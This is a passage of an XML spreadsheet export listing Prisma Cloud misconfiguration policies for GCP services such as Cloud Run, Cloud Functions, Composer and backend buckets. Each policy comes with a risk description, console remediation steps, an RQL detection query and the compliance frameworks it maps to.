7. Under Section 'Egress settings', select a VPC connector from the dropdown
8. In case VPC connector is not available, either select 'Custom' and provide the name of the VPC Connector manually or click on 'Create a Serverless VPC Connector' and follow the link to create a Serverless VPC connector: https://cloud.google.com/vpc/docs/configure-serverless-vpc-access
9. Once the Serverless VPC connector is available, select it from the dropdown
10. Select 'Route only requests to private IPs through the VPC connector' or 'Route all traffic through the VPC connector' as per your organization's policies.
10. Click on 'NEXT'
11. Click on 'DEPLOY'</t>
        </is>
      </c>
      <c r="Y2697" t="inlineStr"/>
      <c r="Z2697" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-cloud-function-v2' AND json.rule = state equals ACTIVE and serviceConfig.vpcConnector does not exist</t>
        </is>
      </c>
      <c r="AA2697" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2697" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2697" t="inlineStr">
        <is>
          <t>PC-GCP-FUN-1251</t>
        </is>
      </c>
      <c r="AD2697" t="b">
        <v>1</v>
      </c>
      <c r="AE2697" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2697" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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7" t="inlineStr">
        <is>
          <t>0bedaabf-e652-4db9-8b8d-24e5270e5a07</t>
        </is>
      </c>
      <c r="AI2697" t="inlineStr">
        <is>
          <t>4d5f08df-15eb-4085-9717-af3ebcdd58eb</t>
        </is>
      </c>
      <c r="AJ2697" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2697" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2698">
      <c r="A2698" t="inlineStr"/>
      <c r="B2698" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2698" s="2" t="inlineStr"/>
      <c r="D2698" t="inlineStr"/>
      <c r="E2698" t="inlineStr"/>
      <c r="F2698" t="inlineStr"/>
      <c r="G2698" t="b">
        <v>1</v>
      </c>
      <c r="H26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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2698" t="inlineStr">
        <is>
          <t>gcloud-cloud-run</t>
        </is>
      </c>
      <c r="K2698" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed GCP Cloud Run Service with administrative permissions</t>
        </is>
      </c>
      <c r="L2698" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2698" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2698" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2698" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2698" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2698" t="inlineStr"/>
      <c r="R2698" t="inlineStr"/>
      <c r="S2698" t="inlineStr"/>
      <c r="T2698" t="b">
        <v>0</v>
      </c>
      <c r="U2698" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2698" t="inlineStr">
        <is>
          <t>gcloud-cloud-run-services-list</t>
        </is>
      </c>
      <c r="W2698" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Run Services that are publicly exposed and have administrative permissions.
The administrative permissions on the cloud run service can be used by attackers for privilege escalation, lateral movement in the environment, creating backdoors, exfiltrating sensitive data, or performing other unauthorized actions in the cloud account.
Immediate attention is required to review role assignments and grant only the least privileges required. Remove unwanted roles assigned to the Cloud Run Service and restrict public exposure reported for the cloud run service as soon as possible.</t>
        </is>
      </c>
      <c r="X2698" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
It is recommended to review and add appropriate, but restrictive roles before revoking access.
1. Log in to the GCP console
2. Navigate to the Cloud Run
3. Go to 'Services' tab
4. Select the required cloud run service
5. Click on 'PERMISSIONS' button
6. Filter for 'allUsers'
7. Click on 'Remove principal' button (pencil icon)
8. Select 'Remove allUsers from all roles on this resource. They may still have access via inherited roles.'
9. Click 'Remove'
10. Repeat steps 6-9 for 'allAuthenticatedUsers'
[PERMISSION]
1. Log in to the GCP console
2. Navigate to the IAM service
3. Find the binding between the service account used by the Cloud Run Service and the role granting administrative permissions.
4. Remove the binding
5. Create a new binding with predefined or custom role without risky permissions, if necessary. Repeat if there is a binding of the service account with another role granting administrative permissions.</t>
        </is>
      </c>
      <c r="Y2698" t="inlineStr"/>
      <c r="Z2698" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-cloud-run-services-list') and finding.name contains all ('GCP Cloud Run service is publicly accessible','GCP Cloud Run with administrative permissions')</t>
        </is>
      </c>
      <c r="AA2698" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2698" t="inlineStr">
        <is>
          <t>2024-08-02 06:55:44</t>
        </is>
      </c>
      <c r="AC2698" t="inlineStr"/>
      <c r="AD2698" t="b">
        <v>1</v>
      </c>
      <c r="AE2698" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2698" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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8" t="inlineStr">
        <is>
          <t>e164d9ea-0770-4f28-9472-b76bd0c6c284</t>
        </is>
      </c>
      <c r="AI2698" t="inlineStr">
        <is>
          <t>cddc634d-0d3c-4948-904a-fe597b3107cd</t>
        </is>
      </c>
      <c r="AJ2698" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2698" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2699">
      <c r="A2699" t="inlineStr"/>
      <c r="B2699" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2699" s="2" t="inlineStr"/>
      <c r="D2699" t="inlineStr"/>
      <c r="E2699" t="inlineStr"/>
      <c r="F2699" t="inlineStr"/>
      <c r="G2699" t="b">
        <v>1</v>
      </c>
      <c r="H26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699" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2699" t="inlineStr">
        <is>
          <t>gcloud-cloud-run</t>
        </is>
      </c>
      <c r="K2699" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed GCP Cloud Run Service with basic role assigned</t>
        </is>
      </c>
      <c r="L2699" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2699" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2699" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2699" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2699" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2699" t="inlineStr"/>
      <c r="R2699" t="inlineStr"/>
      <c r="S2699" t="inlineStr"/>
      <c r="T2699" t="b">
        <v>0</v>
      </c>
      <c r="U2699" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2699" t="inlineStr">
        <is>
          <t>gcloud-cloud-run-services-list</t>
        </is>
      </c>
      <c r="W2699" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Run Services that are publicly exposed and have basic role attached.
Basic roles are highly permissive roles that existed prior to the introduction of IAM. Basic roles on the Cloud Run Service helps the attackers to escalate their privileges, move laterally or perform other unauthorized actions in the cloud account.
This policy checks for the following basic roles:
'Viewer', 'Editor', 'Owner'
Immediate attention is required to review role assignments and grant only the least privileges required. Remove unwanted roles assigned to the Cloud Run Service and restrict public exposure reported for the cloud run service as soon as possible.</t>
        </is>
      </c>
      <c r="X2699" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
It is recommended to review and add appropriate, but restrictive roles before revoking access.
1. Log in to the GCP console
2. Navigate to the Cloud Run
3. Go to 'Services' tab
4. Select the required cloud run service
5. Click on 'PERMISSIONS' button
6. Filter for 'allUsers'
7. Click on 'Remove principal' button (pencil icon)
8. Select 'Remove allUsers from all roles on this resource. They may still have access via inherited roles.'
9. Click 'Remove'
10. Repeat steps 6-9 for 'allAuthenticatedUsers'
[PERMISSION]
1. Log in to the GCP console
2. Navigate to the IAM service
3. Find the binding between the service account used by the Cloud Run Service and the GCP basic role
4. Remove the binding
5. Create a new binding with predefined or custom role without risky permissions, if necessary. Repeat if there is a binding of the service account with another GCP basic role</t>
        </is>
      </c>
      <c r="Y2699" t="inlineStr"/>
      <c r="Z2699" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-cloud-run-services-list') and finding.name contains all ('GCP Cloud Run service is publicly accessible','GCP Cloud Run with basic role')</t>
        </is>
      </c>
      <c r="AA2699" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2699" t="inlineStr">
        <is>
          <t>2024-08-02 06:55:44</t>
        </is>
      </c>
      <c r="AC2699" t="inlineStr"/>
      <c r="AD2699" t="b">
        <v>1</v>
      </c>
      <c r="AE2699" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2699" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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699" t="inlineStr">
        <is>
          <t>0b470e1a-9921-4489-9365-740c9df375eb</t>
        </is>
      </c>
      <c r="AI2699" t="inlineStr">
        <is>
          <t>80190b7a-8608-4eaf-a687-411634591171</t>
        </is>
      </c>
      <c r="AJ2699" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2699" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2700">
      <c r="A2700" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), Risk Management in Technology (RMiT), kfirdaus AWS Account-CS, ISO/IEC 27001:2022, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, CIS Controls v7.1, CIS Controls v7.1, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, Telecommunications Security Act - TSA, PCI DSS v4.0, SOC 2, kashan ACSC Information Security Manual (ISM), SOC 2, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, Copy of CIS Controls v8, Copy of New Zealand Information Security Manual (NZISM v3.4), RBI Baseline Cyber Security and Resilience Requirements, TX-RAMP Level 1, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2700" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2700" s="2" t="inlineStr"/>
      <c r="D2700" t="inlineStr"/>
      <c r="E2700" t="inlineStr"/>
      <c r="F2700" t="inlineStr"/>
      <c r="G2700" t="b">
        <v>1</v>
      </c>
      <c r="H27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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2700" t="inlineStr">
        <is>
          <t>gcloud-cloud-run</t>
        </is>
      </c>
      <c r="K2700" t="inlineStr">
        <is>
          <t>GCP Cloud Run service with overly permissive ingress rule</t>
        </is>
      </c>
      <c r="L2700" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2700" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2700" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2700" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2700" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2700" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2700" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2700" t="inlineStr"/>
      <c r="T2700" t="b">
        <v>0</v>
      </c>
      <c r="U2700" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2700" t="inlineStr">
        <is>
          <t>gcloud-cloud-run-services-list</t>
        </is>
      </c>
      <c r="W2700" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Run services configured with overly permissive ingress rules. It is recommended to restrict the traffic from the internet and other resources by allowing traffic to enter through load balancers or internal traffic for better network-based access control.</t>
        </is>
      </c>
      <c r="X2700" t="inlineStr">
        <is>
          <t>1. Login to GCP console
2. Navigate to service 'Cloud Run'
3. Click on the alerted service, go to tab 'TRIGGERS'
4. Under section 'Ingress', select a ingress type other than 'Allow all traffic'
5. Click on 'SAVE'</t>
        </is>
      </c>
      <c r="Y2700" t="inlineStr"/>
      <c r="Z2700" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-cloud-run-services-list' AND json.rule = "status.conditions[?any(type equals Ready and status equals True)] exists and status.conditions[?any(type equals RoutesReady and status equals True)] exists and ['metadata'].['annotations'].['run.googleapis.com/ingress'] equals all"</t>
        </is>
      </c>
      <c r="AA2700" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2700" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2700" t="inlineStr">
        <is>
          <t>PC-GCP-CLR-791</t>
        </is>
      </c>
      <c r="AD2700" t="b">
        <v>1</v>
      </c>
      <c r="AE2700" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2700" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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0" t="inlineStr">
        <is>
          <t>8796b72d-1ea4-47d4-8cca-efc34be26c92</t>
        </is>
      </c>
      <c r="AI2700" t="inlineStr">
        <is>
          <t>a5216572-7ba5-498b-8934-f352891838fc</t>
        </is>
      </c>
      <c r="AJ2700" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2700" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2701">
      <c r="A2701" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, HITRUST CSF v.11.2.0, ITSG-33, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, SOC 2, NYDFS 23 CRR-NY 500.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, SOC 2, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, TX-RAMP Level 2, ISO/IEC 27001:2022, NIST 800-53 Rev 5, HIPAA, HIPAA</t>
        </is>
      </c>
      <c r="B2701" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2701" s="2" t="inlineStr"/>
      <c r="D2701" t="inlineStr"/>
      <c r="E2701" t="inlineStr"/>
      <c r="F2701" t="inlineStr"/>
      <c r="G2701" t="b">
        <v>1</v>
      </c>
      <c r="H27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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2701" t="inlineStr">
        <is>
          <t>gcloud-cloud-run</t>
        </is>
      </c>
      <c r="K2701" t="inlineStr">
        <is>
          <t>GCP Cloud Run service is publicly accessible</t>
        </is>
      </c>
      <c r="L2701" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2701" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2701" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2701" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2701" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2701" t="inlineStr">
        <is>
          <t>164.312(e)</t>
        </is>
      </c>
      <c r="R2701" t="inlineStr">
        <is>
          <t>164.312(e)(2)(i)</t>
        </is>
      </c>
      <c r="S2701" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2701" t="b">
        <v>0</v>
      </c>
      <c r="U2701" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2701" t="inlineStr">
        <is>
          <t>gcloud-cloud-run-services-list</t>
        </is>
      </c>
      <c r="W2701" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Run services that are publicly accessible. Granting Cloud Run Invoker permission to 'allUsers' or 'allAuthenticatedUsers' allows anyone to access the Cloud Run service over internet. Such access might not be desirable if sensitive data is stored at the location. As security best practice it is recommended to remove public access and assign the least privileges to the GCP Cloud Run service according to requirements.
Note: For public API/website Cloud Run service will permit 'Cloud Run Invoker' to 'allUsers'. 
Refer to the following link for common use cases of authentication to the Cloud Run service.
Link: https://cloud.google.com/run/docs/authenticating/overview</t>
        </is>
      </c>
      <c r="X2701" t="inlineStr">
        <is>
          <t>It is recommended to review and add appropriate, but restrictive roles before revoking access.
To revoke access from 'allusers'/'allAuthenticatedUsers', refer to the following URL:
https://cloud.google.com/run/docs/securing/managing-access#remove-principals</t>
        </is>
      </c>
      <c r="Y2701" t="inlineStr"/>
      <c r="Z2701" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-cloud-run-services-list' AND json.rule = status.conditions[?any(type equals Ready and status equals True)] exists and status.conditions[?any(type equals RoutesReady and status equals True)] exists and iamPolicy.bindings[?any(role equals roles/run.invoker and members is member of (allUsers, allAuthenticatedUsers))] exists</t>
        </is>
      </c>
      <c r="AA2701" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2701" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2701" t="inlineStr">
        <is>
          <t>PC-GCP-CLR-934</t>
        </is>
      </c>
      <c r="AD2701" t="b">
        <v>1</v>
      </c>
      <c r="AE2701" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2701" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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1" t="inlineStr">
        <is>
          <t>f4ff0156-ce21-42ab-aa20-490c3159ecb9</t>
        </is>
      </c>
      <c r="AI2701" t="inlineStr">
        <is>
          <t>a7245ab6-cee9-450e-bd24-e87ae0a28ccb</t>
        </is>
      </c>
      <c r="AJ2701" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2701" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2702">
      <c r="A2702" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B2702" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2702" s="2" t="inlineStr"/>
      <c r="D2702" t="inlineStr"/>
      <c r="E2702" t="inlineStr"/>
      <c r="F2702" t="inlineStr"/>
      <c r="G2702" t="b">
        <v>1</v>
      </c>
      <c r="H27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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2702" t="inlineStr">
        <is>
          <t>gcloud-composer</t>
        </is>
      </c>
      <c r="K2702" t="inlineStr">
        <is>
          <t>GCP Composer environment web server network access control allows access from all IP addresses</t>
        </is>
      </c>
      <c r="L2702" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2702" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2702" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2702" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2702" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2702" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R2702" t="inlineStr">
        <is>
          <t>Network Security</t>
        </is>
      </c>
      <c r="S2702" t="inlineStr"/>
      <c r="T2702" t="b">
        <v>0</v>
      </c>
      <c r="U2702" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2702" t="inlineStr">
        <is>
          <t>gcloud-composer-environment</t>
        </is>
      </c>
      <c r="W2702" t="inlineStr">
        <is>
          <t>This policy identifies GCP Composer environments with web server network access control that allows access from all IP addresses.
Web server network access control defines which IP addresses will have access to the Airflow web server. By default, web server network access control is set to allow all connections from the public internet. Allowing all traffic to the composer environment may allow a bad actor to brute force their way into the system and potentially get access to the entire network.
As a best practice, restrict traffic solely from known IP addresses and limit access to known hosts, services, or specific entities only.</t>
        </is>
      </c>
      <c r="X2702" t="inlineStr">
        <is>
          <t>To configure web server network access of an existing Cloud Composer 1 and Cloud Composer 2 environments, follow the steps given below:
1. Login to the GCP console
2. Navigate to the 'Composer' service (Left Panel)
3. Click on the alerting composer environment
4. Click on the 'ENVIRONMENT CONFIGURATION' tab
5. Under 'Network configuration', click on the 'EDIT' button for the 'Web server access control' setting
6. Select 'Allow access only from specific IP addresses'
7. Add the desired IPs and IP ranges to be allowed.
8. Click the 'Save' button.
To configure web server network access of a new Cloud Composer 1 environment, please refer to the URLs given below:
https://cloud.google.com/composer/docs/how-to/managing/creating#web-server-access
To configure web server network access of a new Cloud Composer 2 environment, please refer to the URLs given below:
https://cloud.google.com/composer/docs/composer-2/create-environments#web-server-access
Note: Cloud Composer 1 is nearing the end of support. The creation of new Cloud Composer 1 environments might be restricted. Further, updates to the existing Cloud Composer 1 environment may be restricted. In such cases, it is recommended to migrate to Cloud Composer 2. To migrate to Cloud Composer 2, please refer to the URLs given below and configure web server network access to limit the access for the new environment:
https://cloud.google.com/composer/docs/migrate-composer-2-snapshots-af-2</t>
        </is>
      </c>
      <c r="Y2702" t="inlineStr"/>
      <c r="Z2702" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-composer-environment' AND json.rule = state equals "RUNNING" and config.webServerNetworkAccessControl.allowedIpRanges[?any( value equals "0.0.0.0/0" or value equals "::0/0" )] exists</t>
        </is>
      </c>
      <c r="AA2702" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2702" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2702" t="inlineStr">
        <is>
          <t>PC-GCP-GCC-1120</t>
        </is>
      </c>
      <c r="AD2702" t="b">
        <v>1</v>
      </c>
      <c r="AE2702" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2702" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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2" t="inlineStr">
        <is>
          <t>b5109da2-3bd0-44ee-b0bd-27845bdfbb10</t>
        </is>
      </c>
      <c r="AI2702" t="inlineStr">
        <is>
          <t>abc9d635-6d3c-47ee-8c7f-8517c5f51212</t>
        </is>
      </c>
      <c r="AJ2702" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2702" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2703">
      <c r="A2703" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, HITRUST CSF v.11.2.0, CSA CCM v4.0.12, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Microsoft Cloud Security Benchmark v1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, NIST CSF v2.0, CRI Profile v2.0, NIST CSF v2.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, DORA</t>
        </is>
      </c>
      <c r="B2703" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2703" s="2" t="inlineStr"/>
      <c r="D2703" t="inlineStr"/>
      <c r="E2703" t="inlineStr"/>
      <c r="F2703" t="inlineStr"/>
      <c r="G2703" t="b">
        <v>1</v>
      </c>
      <c r="H27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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2703" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2703" t="inlineStr">
        <is>
          <t>GCP backend bucket having dangling GCP Storage bucket</t>
        </is>
      </c>
      <c r="L2703" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2703" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2703" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2703" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2703" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2703" t="inlineStr">
        <is>
          <t>Chapter IV</t>
        </is>
      </c>
      <c r="R2703" t="inlineStr">
        <is>
          <t>Article 25, Testing of ICT tools and systems</t>
        </is>
      </c>
      <c r="S2703" t="inlineStr"/>
      <c r="T2703" t="b">
        <v>0</v>
      </c>
      <c r="U2703" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2703" t="inlineStr">
        <is>
          <t>gcloud-compute-backend-bucket</t>
        </is>
      </c>
      <c r="W2703" t="inlineStr">
        <is>
          <t>This policy identifies the GCP backend buckets having dangling GCP Storage bucket.
A GCP backend bucket is usually used by GCP Load Balancers for serving static content. Such setups can also have DNS pointing to the load balancer's IP for easy human access. A GCP backend bucket pointing to a GCP storage bucket that doesn't exist in the same project is a potential risk of bucket takeover as well as at risk of subdomain takeover. An attacker can exploit such a setup by creating a GCP Storage bucket with the same name in their own GCP project, thus receiving all requests redirected to this backend bucket from the load balancer to an attacker-controlled GCP Storage bucket. This attacker-controlled bucket can be used to serve malicious content to perform phishing attacks, spread malware, or engage in other illegal activities.
As a best practice, it is recommended to review and protect GCP storage buckets bound to a GCP backend bucket from accidental deletion. Delete the GCP backend bucket if it points to a non-existent GCP storage bucket.</t>
        </is>
      </c>
      <c r="X2703" t="inlineStr">
        <is>
          <t>To mitigate the risk, either delete the GCP backend bucket or create a GCP Storage bucket with the name in your account to which the GCP backend bucket points.
# Delete GCP backend bucket
To delete a GCP backend bucket, it should be disassociated from all GCL Load balancers first. The following steps might be followed:
1. Identify the backend bucket pointing to a non-existing GCP Storage bucket.
2. Login to GCP Portal
3. Go to Network services -&gt; Load Balancing
4. Click on "Backends"
5. Note the names of load balancers that are using the GCP backend bucket. Names are shown under the "Load balancer" column
6. Click on the "LOAD BALANCERS" tab
7. Click on the load balancer name for each load balancer identified in step 4 and repeat the following steps:
 i. After opening the load balancer page, click on "EDIT"
  ii. Go to Backend configuration
 iii. Under the "Backend buckets" section, remove the GCP backend bucket by clicking "cross" icon in front of it
 iv. Go to Routing rules. Edit the rules as desired. Remove any rules pointing to the reported backend bucket.
 v. Click Update
8. Click and switch back to the "Backends" tab
9. Select the GCP backend bucket, the option to delete now should be available.
10. Click "Delete" -&gt; "DELETE"
# Create a new GCP Storage bucket
Refer to the following link on how to create a new GCP Storage bucket and create a new bucket with the same name as the one the GCP backend bucket is pointing to:
https://cloud.google.com/storage/docs/creating-buckets#create_a_new_bucket</t>
        </is>
      </c>
      <c r="Y2703" t="inlineStr"/>
      <c r="Z2703" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-backend-bucket' as X; config from cloud.resource where api.name = 'gcloud-storage-buckets-list' as Y; filter ' not (Y.name intersects X.bucketName) '; show X;</t>
        </is>
      </c>
      <c r="AA2703" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2703" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2703" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-1063</t>
        </is>
      </c>
